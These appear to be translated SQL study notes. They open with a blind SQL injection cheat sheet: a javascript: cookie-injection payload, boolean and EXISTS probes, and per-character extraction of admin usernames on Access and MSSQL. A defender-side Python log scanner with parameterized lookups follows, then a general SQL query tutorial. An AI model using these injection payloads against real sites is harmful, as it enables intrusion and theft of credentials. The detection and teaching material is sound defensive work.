javascript:alert(document.cookie = "參數= " + escape("參數值 攻擊代碼"))
(cookie form: 參數 is the parameter name, 參數值 the parameter value, 攻擊代碼 the injected code)
e.g.: javascript:alert(document.cookie = "參數= " + escape("參數值 and 1=1"))
Check whether injection is possible
http://127.0.0.1/xx?id=11 and 1=1 (normal page)
http://127.0.0.1/xx?id=11 and 1=2 (error page)
Check the table
http://127.0.0.1/xx?id=11 and exists (select * from admin)
Check the column
http://127.0.0.1/xx?id=11 and exists (select username from admin)
Check the ID
http://127.0.0.1/xx?id=11 and exists (select id from admin where ID=1)
Check the length
http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)
Check whether the database is MSSQL
http://127.0.0.1/xx?id=11 and exists (select * from sysobjects)
Check whether the character is English (ASCII)
(Access database)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)
(MSSQL database)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)
Narrow down the character's range
(Access database)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)
(MSSQL database)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)
Check which character it is
(Access database)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)
(MSSQL database)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1)
Common functions
Access: asc(char)   SQL Server: unicode(char)
Purpose: returns the ASCII code of a character
Access: chr(number)   SQL Server: nchar(number)
Purpose: the inverse of asc; returns the character for a given ASCII code
Access: mid(string, N, L)   SQL Server: substring(string, N, L)
Purpose: returns the substring of length L starting at character N, i.e. the characters from N to N+L
Access: abs(number)   SQL Server: abs(number)
Purpose: returns the absolute value of a number (needed when guessing Chinese characters)
Access: A between B and C   SQL Server: A between B and C
Purpose: tests whether A lies between B and C
and exists(Select top 1 * From 用戶 order by id)
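Added example (not from the original notes): a defender-side Python check that flags the probe forms listed above in access-log query strings, plus the validated, parameterized lookup that makes such input inert. The log lines, the items table and all names are constructed for this demonstration.

```python
import re, sqlite3
from urllib.parse import urlsplit, parse_qsl

# Signatures of the probe forms listed above: boolean test (and 1=1 / and 1=2), EXISTS(SELECT ...)
# table/column probing, per-character guessing via asc(mid()) / unicode(substring()), and sysobjects.
PROBE_PATTERNS = [
    ("boolean-test", re.compile(r"\band\s+\d+\s*=\s*\d+\b", re.I)),
    ("exists-probe", re.compile(r"\band\s+exists\s*\(\s*select\b", re.I)),
    ("char-guess", re.compile(r"\b(?:asc|unicode)\s*\(\s*(?:mid|substring)\s*\(", re.I)),
    ("mssql-fingerprint", re.compile(r"\bsysobjects\b", re.I)),
]

def classify_request(url):
    """Return the probe labels found in any percent-decoded query value of url."""
    hits = []
    for _, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for label, pattern in PROBE_PATTERNS:
            if pattern.search(value) and label not in hits:
                hits.append(label)
    return hits

def scan_log(lines):
    """Return (url, labels) for each access-log line whose request carries a probe."""
    request_re = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
    findings = []
    for line in lines:
        m = request_re.search(line)
        if m and (labels := classify_request(m.group(1))):
            findings.append((m.group(1), labels))
    return findings

def safe_lookup(conn, raw_id):
    """Mitigation: validate the type, then bind the value instead of splicing it into SQL."""
    try:
        item_id = int(raw_id)   # "11 and 1=1" is rejected here and never reaches the query
    except ValueError:
        return None
    return conn.execute("select name from items where id = ?", (item_id,)).fetchall()

# Constructed sample log lines (not real traffic); the probes mirror the URLs above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /xx?id=11 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /xx?id=11%20and%201=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /xx?id=11%20and%20exists%20(select%20*%20from%20sysobjects) HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /xx?id=11%20and%20exists%20(select%20id%20from%20admin%20where%20asc(mid(username,1,1))=97%20and%20ID=1) HTTP/1.1" 500 0',
]

def demo_safe_lookup():
    """Constructed in-memory table: a valid id is found, a probe string is rejected."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("create table items (id integer primary key, name text); insert into items values (11, 'widget');")
    return safe_lookup(conn, "11"), safe_lookup(conn, "11 and 1=1")
```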
1. Displaying column names in the query result:
a. Using the as keyword: select name as '姓名' from students order by age
b. Directly: select name '姓名' from students order by age
2. Exact lookup:
a. Restrict the range with in: select * from students where native in ('湖南', '四川')
b. between...and: select * from students where age between 20 and 30
c. "=": select * from students where name = '李山'
d. like: select * from students where name like '李%' (note: a "%" in the query condition means partial matching, and the position carries meaning: this finds entries beginning with "李". To find all entries containing "李", use '%李%'; if 李 is the second character, use '_李%', '_李' or '_李_'.)
e. [] match-check: select * from courses where cno like '[AC]%' (expresses an "or" relation, similar to "in(...)"; "[]" can also express a range, e.g. select * from courses where cno like '[A-C]%')
3. Handling date/time variables
a. smalldatetime: handle it the same way as a string, e.g. select * from students where birth >= '1980-1-1' and birth <= '1980-12-31'
4. Aggregate functions
a. count(): counts rows, e.g. select count(*) from students (total number of students)
b. avg(column): average, e.g. select avg(mark) from grades where cno='B2'
c. max(column) and min(column): maximum and minimum
5. Grouping (group)
Mostly used for statistics, e.g. counting per group: select gender,count(sno) from students group by gender (how many male and female students there are)
Note: group by whichever column matches the angle from which you want to group.
For multi-level grouping, simply list the grouping rules. For example, to count male and female students per intake year and major, the grouping rules are intake year (grade), major (mno) and gender (gender), so "group by grade, mno, gender":
select grade, mno, gender, count(*) from students group by grade, mno, gender
group is usually combined with having; e.g. to find students who failed more than one course, group by student number (sno):
select sno,count(*) from grades where mark<60 group by sno having count(*)>1
6. UNION
Merge query results, e.g.:
SELECT * FROM students WHERE name like '張%' UNION [ALL] SELECT * FROM students WHERE name like '李%'
7. Multi-table queries
a. Inner join
select g.sno,s.name,c.coursename from grades g JOIN students s ON g.sno=s.sno JOIN courses c ON g.cno=c.cno
(note that aliases can be used)
b. Outer joins
b1. Left join
select courses.cno,max(coursename),count(sno) from courses LEFT JOIN grades ON courses.cno=grades.cno group by courses.cno
Left join characteristic: every row of the left table is shown, even rows whose data is not completely filled in.
A left outer join returns the rows that exist in the left table but not in the right table, plus the inner-join rows.
b2. Right join
Similar to the left join
b3. Full join
select sno,name,major from students FULL JOIN majors ON students.mno=majors.mno
All rows of both tables are shown
c. Self join
select c1.cno,c1.coursename,c1.pno,c2.coursename from courses c1,courses c2 where c1.pno=c2.cno
Aliases solve the problem.
d. Cross join
select lastname+firstname from lastname CROSS JOIN firstname
Equivalent to a Cartesian product
8. Nested queries
a. Using IN, e.g. find the students from the same hometown as 豬豬:
select * from students where native in (select native from students where name='豬豬')
b. Using EXISTS; e.g. the following two statements are equivalent:
select * from students where sno in (select sno from grades where cno='B2')
select * from students where exists (select * from grades where grades.sno=students.sno AND cno='B2')
9. Ordering (order)
a. There are two directions: asc (ascending) and desc (descending)
b. You can order by one of the queried items, and that item can be given by its ordinal number, e.g.:
select sno,count(*) ,avg(mark) from grades group by sno having avg(mark)>85 order by 3
10. Other
a. Identifiers containing spaces must be enclosed in "[]".
b. To query for rows where a column holds no data, test for null, e.g. select sno,courseno from grades where mark IS NULL
c. Note the difference between any and all in nested queries: any corresponds to the logical "||", all to the logical "&&"
d. Beware of the trap when writing queries with a negative meaning:
e.g. students who have not taken course 'B2':
select students.* from students, grades where students.sno=grades.sno AND grades.cno <> 'B2'
The query above is wrong; the correct form is given below:
select * from students where not exists (select * from grades where grades.sno=students.sno AND cno='B2')
11. Approach to difficult multi-level nested queries, e.g. students who have taken every course:
select * from students where not exists (select * from courses where NOT EXISTS (select * from grades where sno=students.sno AND cno=courses.cno))
Outermost level: select from the students table, excluding those who have some course not taken, using not exists. Since the objects being discussed are courses, the second level selects from the courses table and excludes the ones that were taken.
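Added example (not part of the original notes): a runnable Python/sqlite3 check of the negation trap in item 10d and the double NOT EXISTS of item 11, on constructed students/courses/grades rows, so the wrong and right answer sets can be compared side by side.

```python
import sqlite3

# Constructed sample data (not from the original notes): Alice took both courses,
# Bob took only B1, Carol took nothing.
SCHEMA = """
create table students (sno integer primary key, name text);
create table courses  (cno text primary key, coursename text);
create table grades   (sno integer, cno text, mark integer);
insert into students values (1, 'Alice'), (2, 'Bob'), (3, 'Carol');
insert into courses  values ('B1', 'Algebra'), ('B2', 'Databases');
insert into grades   values (1, 'B1', 90), (1, 'B2', 85), (2, 'B1', 70);
"""

# Item 10d, the wrong form: the join keeps anyone with at least one non-B2 grade
# (Alice, who did take B2) and drops anyone with no grades at all (Carol).
WRONG_NOT_B2 = """
select students.* from students, grades
 where students.sno = grades.sno and grades.cno <> 'B2'"""

# Item 10d, the correct form: a student qualifies only if no B2 grade exists.
RIGHT_NOT_B2 = """
select * from students where not exists
  (select * from grades where grades.sno = students.sno and cno = 'B2')"""

# Item 11: there is no course for which this student lacks a grade.
ALL_COURSES = """
select * from students where not exists
  (select * from courses where not exists
     (select * from grades where sno = students.sno and cno = courses.cno))"""

def open_db():
    """In-memory SQLite database loaded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def names(conn, sql):
    """Run a query that returns student rows and give back the sorted names."""
    return sorted(row[1] for row in conn.execute(sql))

def compare():
    """Answer set of each query, so the wrong and right forms can be compared."""
    conn = open_db()
    return {
        "wrong_not_b2": names(conn, WRONG_NOT_B2),   # ['Alice', 'Bob']
        "right_not_b2": names(conn, RIGHT_NOT_B2),   # ['Bob', 'Carol']
        "all_courses": names(conn, ALL_COURSES),     # ['Alice']
    }
```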